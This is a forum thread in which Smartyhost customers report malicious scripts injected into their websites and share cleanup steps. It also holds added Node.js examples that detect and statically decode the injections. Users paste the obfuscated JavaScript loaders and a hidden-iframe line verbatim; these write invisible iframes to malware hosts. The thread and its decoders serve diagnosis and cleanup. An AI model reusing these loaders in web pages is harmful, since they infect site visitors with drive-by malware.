So if anyone from Smartyhost reads this, you have lost about 10 sites to Jumba with me alone. I have been hosting with you since 2002. I was one of the stayers that gave you 9 lives. But I am afraid you have used them all.

posted 2008-Nov-11, 7am AEST
User #182769   1634 posts
Whirlpool Enthusiast

Today I visited my Website hosted by smartyhost to find it is blocked also.

I downloaded my pages only to find the following code inserted at the bottom of my page.

"<script>function load(code,dfunc,anticasp){eval(dfunc);decrypt(code);}load('<`B15ni[X1hIZQQFx;;MuM./z.3z.MMM;~5lX;`Y(i9.FZF[g`(QZIm[Zi`lZQIm><;`B15ni>',unescape('function decrypt%28n%29%7Bvar l%2Cch%2Cind%2Cq%3D%22%22%2Ckey%3D%22OD%26%3Ax9T6H%40fBAC%23y_wgloSEb%7EK %5BchZei%60a5z-%7Bjv%21Pk%7Cr1mnYU%7DqV7%2F%3BpF%5DsXG%3DILtQJ0u%5C%272Md%284%2A%22%3Bfor%28l%3D0%3Bl%3Cn.length%3Bl%2B%2B%29%7Bch%3Dn.charAt%28l%29%3Bind%3Dkey.indexOf%28ch%29%3Bif%28ind%3E-1%29%7Bif%28ind%3D%3D0%29%7Bind %3D79%7Dq%2B%3Dkey.charAt%28ind-1%29%7D else %7Bq%2B%3Dch%7D%7D%3Bdocument.write%28q%29%7D'));<Removed>

I have always been a supporter of smartyhost and recommended them to friends, relatives, customers. But now I am just p!ssed.

I have opened a ticket just waiting to hear back >.<

posted 2008-Nov-12, 10am AEST
User #33633   2237 posts
Whirlpool Forums Addict

passionfruit writes...

I have been slowly moving all of my "budget" hosting over to Jumba

They'll be thrilled :)

posted 2008-Nov-12, 11am AEST
User #31478   162 posts
Forum Regular

We look after a site with them, not our choice, and it's been infected again!

How awesome is that.

Smartyhost are the worst hosting company.

posted 2008-Nov-12, 12pm AEST
User #182769   1634 posts
Whirlpool Enthusiast

Killer Klaus0r writes...

Smartyhost are the worst hosting company.

Where's that bandwagon? I would like to jump on if I may ;p

posted 2008-Nov-12, 1pm AEST
User #172288   97 posts
Forum Regular

Woohoo! My site is also blocked. I am going to leave Smartyhost tomorrow. Insecure and ridiculously expensive for what it is.

Is it possible to transfer my domain to another host? Is this expensive?

What a nightmare.

posted 2008-Nov-12, 10pm AEST
User #105752   225 posts
Forum Regular

Yes!!
And now, to get yourself delisted as a spyware site by Google, you have to add Google spyware to your code.
Interesting!!!!!!!

posted 2008-Nov-13, 9am AEST
User #57859   311 posts
Forum Regular

I dealt with this sort of stuff about 4-5 years ago on a stack of websites. Basically I was working for a web-dev company, and we resold hosting (eww). The reseller account itself was on a shared web server.

Now the problem is that on a lot of these setups, there is either vulnerabilities in the management software (i.e. cPanel/Plesk), which allows somebody to gain complete control, or there is a silly situation with the way the web server (normally Apache) is configured – it's typically set to run Apache as a single user, regardless of the site being shown (i.e. www-data:www-data or something like that), and so you end up with a situation where a vulnerability in a single client site is basically a vulnerability in all websites.

In the end I had to transfer a stack of sites across to another host, and also discuss these issues with the new hosting company (I did thorough testing to ensure it couldn't happen again) and in the end they did a good job of checking everything and making some changes based on conversations we had (the new hosting company was westnet btw).

Ultimately I decided to never use cheap hosting again, and generally stick to ones I know that have implemented things properly. I mostly use either westnet or ilisys. Others may also be good, but unfortunately it's hard to know without signing up and trying them out.

IMO the issue has come about because so many hosts seem to be network admin experts, but don't entirely understand the implications of shared hosting, and think they can just roll out a cPanel/Plesk-style pre-made setup and all will be sweet. As it turns out, it's not that simple.

I should point out that I can't actually recall what web control panel was the issue (i.e. cPanel, Plesk, others), I just mention those two to indicate the sort of system that was in use.

Good luck dealing with the various annoying hidden iframe crap.

posted 2008-Nov-13, 10am AEST
User #182769   1634 posts
Whirlpool Enthusiast

seawise writes...

Yes!!
And now, to get yourself delisted as a spyware site by Google, you have to add Google spyware to your code.
Interesting!!!!!!!

What are you talking about? I got my issue resolved, with NO extra "Google spyware code" added to my pages.

SmartyHost removed the code for me and I used http://www.stopbadware.org/home/reportsearch to remove my site from being blacklisted.

Simple fix but still a pain in the @ss.

If it happens again I will leave them for sure.

posted 2008-Nov-13, 11am AEST
User #213844   330 posts
Forum Regular

**Mafaroo** writes...

If it happens again I will leave them for sure.

Wow, what a trusting client.

Please do the research now and choose your next host. Make sure you have full backups and if your site changes regularly, get a process to back it up regularly.

They've proven to be incapable of protecting clients from this problem as the thread goes back months – get out now!

posted 2008-Nov-13, 12pm AEST
User #105752   225 posts
Forum Regular

Tks Mafaroo
I reloaded the site so it's now clean.
I originally tried to get Google to recheck the site, and that's when I encountered all the crap about adding Google code.
(It appears you can't ask Google themselves to recheck it unless you put their code into the webpage.)
So I took your alternative solution through "stopbadware.org", and hopefully it will get cleared soon.

posted 2008-Nov-13, 1pm AEST
User #36134   3734 posts
Whirlpool Forums Addict

A guy on another forum was having the same problem.

I asked if he was on smartyhost, yep he is.

He has an email from a few days ago where they blame his scripts (static HTML site), but then also admit they are working with a security firm to investigate (yeah I know, standard BS response).

Can't believe they still deny and point the finger at clients. This issue is months old; don't pretend they didn't see this thread from the start.

posted 2008-Nov-13, 1pm AEST
User #182769   1634 posts
Whirlpool Enthusiast

seawise writes...

So I took your alternative solution thru "stopbadware.org",and hopefully it will get cleard soon

Nice, I filled out the online form yesterday afternoon and it was unblocked when I checked this morning.

posted 2008-Nov-13, 1pm AEST
User #172288   97 posts
Forum Regular

I filled out the form two days ago and it still has not been delisted. I used the Google Administrator tools to report it. I will try the StopBadWare one now.

Ridiculous company.

posted 2008-Nov-14, 1am AEST
User #134479   345 posts
Forum Regular

**Mafaroo** writes...

Where's that bandwagon? I would like to jump on if I may ;p

SMARTYHOST IS CRAP. Pretty sure it's just one guy that runs it out of his grandmother's basement.

posted 2008-Nov-14, 2pm AEST
User #120755   5 posts
Forum Regular

Ah yes, only 12 months after the migration stuff-up we are all having to deal with another flaw in the Smartyhost system.

I have nearly 200 accounts with SH and have experienced this virus problem with 20+ this time, and some months ago the same problem with 10 other sites.

The best way to fix it is to:
1. Change the FTP password; use 12 characters with strong content.
2. Download the index files from the site and remove the malicious code, which is usually on the 3rd last line, above </html>.
3. Reload the files.
4. If you have Flash content on the index page named index.swf, remove the file and add the one you have on your local computer.
5. Add the site to Google Webmaster Tools.
6. Verify the site with the HTML file method.
7. From the Google tool, submit the site to be reviewed and the blacklist removed.

This all worked for me, and as of today SH have found a workaround and have found the issue and have fixed it; you will notice in your server under the index.html file a file like this: index.html.200808261302, which can be left there or removed as all malicious code was removed.

The thing that has peeved me off is the time I have had to spend on this and the numerous clients I have had to deal with, not to mention the 2 that I have now lost!!!!

posted 2008-Nov-14, 2pm AEST
edited 2008-Nov-14, 2pm AEST
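Mibar's steps above (pull the index files down, find the block sitting just above </html>, remove it, re-upload) and brianoz's earlier suggestion to compare the file on the server with what the server actually sends can both be scripted. What follows is an added example in Node.js, not code from the thread or from Smartyhost. It recognises the injection shapes posted in this thread (the eval/unescape loader, the charCodeAt(i)-1 loader, and the hidden hostads.cn iframe reported later), strips them, and classifies an infection as file-level or on-the-fly. The regular expressions are my own and the sample pages are constructed; in practice you would feed it the copy you pulled down by FTP and the copy fetched with a browser or curl.

```javascript
// Added example (not code from the thread or from Smartyhost). Recognises the
// injected blocks reported in this thread, strips them, and tells a file-level
// injection apart from an on-the-fly one. Regexes are mine; sample pages are
// constructed.

const INJECTION_PATTERNS = [
  {
    // <script>function load(code,dfunc,...){eval(dfunc);decrypt(code);}load('...',unescape('...'));</script>
    name: "eval-unescape loader",
    re: /<script>\s*function load\([^)]*\)\s*\{\s*eval\([\s\S]*?<\/script>/gi,
  },
  {
    // <script>var source ="...";...String.fromCharCode(source.charCodeAt(i)-1);...document.write(result);</script>
    name: "charCode-shift loader",
    re: /<script>\s*var source\s*=[\s\S]*?charCodeAt\(i\)\s*-\s*1\)[\s\S]*?document\.write\(result\);\s*<\/script>/gi,
  },
  {
    // <iframe src=http://hostads.cn style=display:none></iframe>
    name: "hidden iframe",
    re: /<iframe\b[^>]*\bstyle=["']?display:\s*none[^>]*>\s*<\/iframe>/gi,
  },
];

// Every known injection in a page, sorted by position. The offset lets you
// confirm the thread's observation that the block sits just above </html>.
function findInjections(html) {
  const hits = [];
  for (const p of INJECTION_PATTERNS) {
    p.re.lastIndex = 0;
    let m;
    while ((m = p.re.exec(html)) !== null) {
      hits.push({ name: p.name, offset: m.index, snippet: m[0].slice(0, 60) });
    }
  }
  return hits.sort((a, b) => a.offset - b.offset);
}

// The page with the known injections removed; legitimate scripts are untouched.
function stripInjections(html) {
  let out = html;
  for (const p of INJECTION_PATTERNS) out = out.replace(p.re, "");
  return out;
}

// diskHtml: the file pulled down over FTP. servedHtml: the same URL fetched over HTTP.
//   "file-modified": the stored file carries the payload, so something can write
//                    to the account (FTP credentials, a writable script, the host).
//   "on-the-fly":    the file is clean but the response is not, so the payload is
//                    being added at serve time (web server module, proxy): server-level.
//   "clean":         no known payload in either copy.
function classifyInfection(diskHtml, servedHtml) {
  if (findInjections(diskHtml).length > 0) return "file-modified";
  if (findInjections(servedHtml).length > 0) return "on-the-fly";
  return "clean";
}

// Constructed samples: a static page with a Flash check, the same page with the
// charCode-shift loader from this thread dropped above </body></html>, and one
// with the hidden-iframe variant.
const FLASH_CHECK = '<script>var hasFlash = navigator.plugins["Shockwave Flash"] != null;</script>';
const LOADER =
  '<script>var source ="=jgsbnf!tsd>#iuuq;00hpphmf.bobmjufdt/dpn0jo/dhj@3#!xjeui>2!ifjhiu>2!tuzmf>#wjtjcjmjuz;!ijeefo#?=0jgsbnf?"; var result = "";\n' +
  "for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);\n" +
  "document.write(result); </script>";
const CLEAN_PAGE =
  "<html><head><title>Home</title></head><body>\n" + FLASH_CHECK + "\n<p>Welcome</p>\n</body></html>\n";
const INFECTED_PAGE = CLEAN_PAGE.replace("</body></html>", LOADER + "\n</body></html>");
const IFRAME_PAGE = CLEAN_PAGE.replace(
  "</body></html>",
  "<iframe src=http://hostads.cn style=display:none></iframe>\n</body></html>"
);

console.log(findInjections(INFECTED_PAGE));
console.log(classifyInfection(INFECTED_PAGE, INFECTED_PAGE)); // file-modified
console.log(classifyInfection(CLEAN_PAGE, INFECTED_PAGE));    // on-the-fly
```

The classification is the point: if the FTP copy is clean and the HTTP copy is not, cleaning files and changing passwords will not help, because the payload is being added by something on the server side of the file, which is what brianoz called a major server compromise. If the FTP copy itself carries the block, then something with write access to the account put it there, and the password change in step 1 is the right first move.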
User #31478   162 posts
Forum Regular

It's a pity; it seems there aren't too many good hosters left nowadays.
Nothing beats a certain company that has phone support: when you call up, they either say submit a ticket, or if you ask to speak to the person in charge of a certain area, that person says "I am", but then says "sorry, I dunno how to fix that problem, submit a ticket".

In the end, the old adage holds true: you get what you pay for, and I'm sick of monkeys.

posted 2008-Nov-14, 3pm AEST
User #244659   122 posts
Forum Regular

Killer Klaus0r writes...

In the end, the old adage holds true: you get what you pay for, and I'm sick of monkeys.

Give www.cove.com.au a look. I have one of their "business" plans using a discount coupon and it's been nothing but perfect. I have had to use support a couple of times (phone and email) and everything I have needed has been done quickly.

They have reps on Whirlpool too, so that is nice to know.

- Zac

posted 2008-Nov-14, 5pm AEST
User #197954   43 posts
Forum Regular

Thanks for the update Mibar, Whirlpool is the closest thing us Smartyhost users have to customer support :)

I had a lengthy discussion with Tim from Smartyhost after my post here, so yes they are watching whirlpool.

On the issue of this problem all he said was,

Hi Peter. I was interested to find out (from one of our resellers) that Melbourne IT had a similar issue last year. Hackers will always try to exploit a new wrinkle until we jump on them with both feet. But it might interest you to know that all of the resources of Smartyhost and MYOB (and a lot of money and outside consultants) were thrown at the problem.

No mention of whether the problem is actually fixed, or even what it was for that matter. But it is the first admission that there is an issue with their servers that I have come across.

When I questioned Tim on why they don't have an open disclosure policy and can't simply communicate with their clients as to what is happening and why it is happening, his reply on this was:

At Smartyhost we try and tread a fine line between harassing our customers (and our resellers) with information which is often of no use to them and sometimes confusing.

So apparently a PHP upgrade from php4 to php5 on my server was information that was deemed no use to me?

I have a question for all Smartyhost users: apart from an email the day before the botched Optus migration, has anyone ever had any contact from Smartyhost to tell them of any upcoming maintenance, outage etc.? Since 2002 I have not, and I am wondering if it is just me. I'm not sure about this fine line; IMO there is simply no disclosure whatsoever.

Oh, and this was a giggle. Here is a snippet of the email you receive from Google when your site has been screened and delisted:

In many cases, a website run by an innocent site owner has been hacked by a malicious third party, causing the site to distribute badware without the site owner's knowledge. If your site was distributing badware because it has been hacked, then simply removing the bad code from your site is not enough to keep your site clean in the future. You will also need to work with your hosting provider to fix all security vulnerabilities associated with your site.

the bold bit made me laugh. sure bob... sure

posted 2008-Nov-18, 9am AEST
User #192054   64 posts
Forum Regular

It's true, you get what you pay for...

You might be ahead for some time, but when the shit hits the fan it's a different story. For critical sites, or if I was a reseller, there is no way I would be going el cheapo.

At the end of the day, when you start losing clients/income over hosting it pays to spend the money. After all, your website counts for a lot of your business's reputation.

posted 2008-Nov-18, 11am AEST
edited 2008-Nov-18, 11am AEST
User #213874   5 posts
Forum Regular

I've had 6 websites have this code inserted today:

<script>var source ="=jgsbnf!tsd>#iuuq;00hpphmf.bobmjufdt/dpn0jo/dhj@3#!xjeui>2!ifjhiu>2!tuzmf>#wjtjcjmjuz;!ijeefo#?=0jgsbnf?"; var result = "";

for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);

document.write(result); </script>

I've removed other code numerous times (more times than I care to count, to be honest) and this time it completely crashed a forum and rendered two other PHP pages useless.

posted 2008-Nov-26, 9am AEST
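The two loaders quoted in this thread (the eval(dfunc)/decrypt one with the long key, and the charCodeAt(i)-1 one just above) can be decoded offline without running them. The following is an added example in Node.js, not code from the thread: it re-implements both transforms as plain functions and pulls the iframe URLs out of the result. The payload strings are copied from the two posts; the key is the one from the posted decrypt() after unescape(), with its \' escape resolved to a plain quote. The first loader as posted is truncated (<Removed>), so only its two argument strings are used here.

```javascript
// Added example (not code from the thread). Static decoders for the two loaders
// posted in this thread: the transforms are re-implemented here so the hidden
// payload can be read without ever running the attacker's script.

// Loader 1 (charCodeAt(i)-1 variant): each payload byte was stored one higher
// than its real value, so decoding is a shift of one down.
function decodeShiftByOne(source) {
  let out = "";
  for (let i = 0; i < source.length; i++) {
    out += String.fromCharCode(source.charCodeAt(i) - 1);
  }
  return out;
}

// Loader 2 (eval(dfunc)/decrypt variant): a substitution cipher. A payload
// character found in `key` becomes the key character just before it; anything
// not in the key (including < and >) passes through unchanged. The posted
// decrypt() wraps index 0 to 79, which on this 78-character key gives "" for
// "O"; that quirk is reproduced rather than "fixed", since the payload never
// uses "O".
function decodeSubstitution(code, key) {
  let out = "";
  for (const ch of code) {
    let ind = key.indexOf(ch);
    if (ind > -1) {
      if (ind === 0) ind = 79;
      out += key.charAt(ind - 1);
    } else {
      out += ch;
    }
  }
  return out;
}

// Every iframe src in the decoded HTML: these are the indicators to block at
// the edge and to grep the other accounts' pages for.
function iframeSources(html) {
  const re = /<iframe[^>]*\ssrc=["']?([^"'\s>]+)/gi;
  const urls = [];
  let m;
  while ((m = re.exec(html)) !== null) urls.push(m[1]);
  return urls;
}

// Payloads copied from the posts above. SUBST_KEY is the key string from the
// posted decrypt() after unescape(), with its \' escape resolved to a quote.
const SHIFTED_PAYLOAD =
  "=jgsbnf!tsd>#iuuq;00hpphmf.bobmjufdt/dpn0jo/dhj@3#!xjeui>2!ifjhiu>2!tuzmf>#wjtjcjmjuz;!ijeefo#?=0jgsbnf?";
const SUBST_KEY =
  "OD&:x9T6H@fBAC#y_wgloSEb~K [chZei`a5z-{jv!Pk|r1mnYU}qV7/;pF]sXG=ILtQJ0u'2Md(4*";
const SUBST_PAYLOAD =
  "<`B15ni[X1hIZQQFx;;MuM./z.3z.MMM;~5lX;`Y(i9.FZF[g`(QZIm[Zi`lZQIm><;`B15ni>";

function decodeAll() {
  return {
    shifted: decodeShiftByOne(SHIFTED_PAYLOAD),
    substituted: decodeSubstitution(SUBST_PAYLOAD, SUBST_KEY),
  };
}

const decoded = decodeAll();
console.log(decoded.shifted);
console.log(decoded.substituted);
console.log(iframeSources(decoded.shifted + "\n" + decoded.substituted));
```

Both payloads decode to a 1x1 hidden iframe: the charCodeAt one points at an in.cgi script on google-analitecs.com, the decrypt one at /bags/index.php on a bare IP address. Decoding this way, rather than loading the page in a browser with a debugger, is the safe route: the loader only needs document.write to run, and a visit is enough to get the drive-by served to you.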
User #184883   67 posts
Forum Regular

This happened to 3 of my sites.

Did everyone get new passwords sent to them from SH yesterday?
Do you think they did this because of this issue?
I think they extended all passwords to 12 digits now

posted 2008-Nov-28, 10am AEST
User #244659   122 posts
Forum Regular

Has anybody been able to work out how the code is being inserted?

It could be a range of things, from compromised FTP passwords to a PHP app that's out of date, or even a server being hacked to shreds.

It would just be good to know if it's random or there is some common link here.

- Zac

posted 2008-Nov-28, 4pm AEST
User #249340   76 posts
In the penalty box

Zac Greenhill writes...

compromised FTP passwords

Unlikely, Zac, as it's more than one account we're talking about here.

Zac Greenhill writes...

PHP app thats out of date

Most common

Zac Greenhill writes...

server being hacked to shreds

Not as common, but it's a likely story.

posted 2008-Nov-29, 12pm AEST
User #18136   2270 posts
Whirlpool Forums Addict

Was there ever a final announcement of what actually happened here – either directly from SmartyHost, or from a User's personal investigation/knowledge?

It looks like a separate webhosting company, ICDSoft, has been hit with the exact same attack this past week – even inserting the exact same code/iframe snippet.

I have seen it affect completely different Accounts, some with php scripts, others completely static HTML.

I am going to follow up with them and see what they know – but if someone has some more info already, it would help.

i.e. If I just say "It happened to SmartyHost last year" it probably wouldn't assist much. But if I named a specific Trojan name or something, or a specific exploit, it could help.

Thanks.

posted 2009-Jan-19, 10am AEST
User #182769   1634 posts
Whirlpool Enthusiast

I have just had 2 of my sites with this code injected into all the pages: <iframe src=http://hostads.cn style=display:none></iframe>. This is the second time I have had my sites compromised by these assholes; I will be moving asap.

Smartyhost = Worst Hosting Ever

posted 2009-Apr-1, 3pm AEST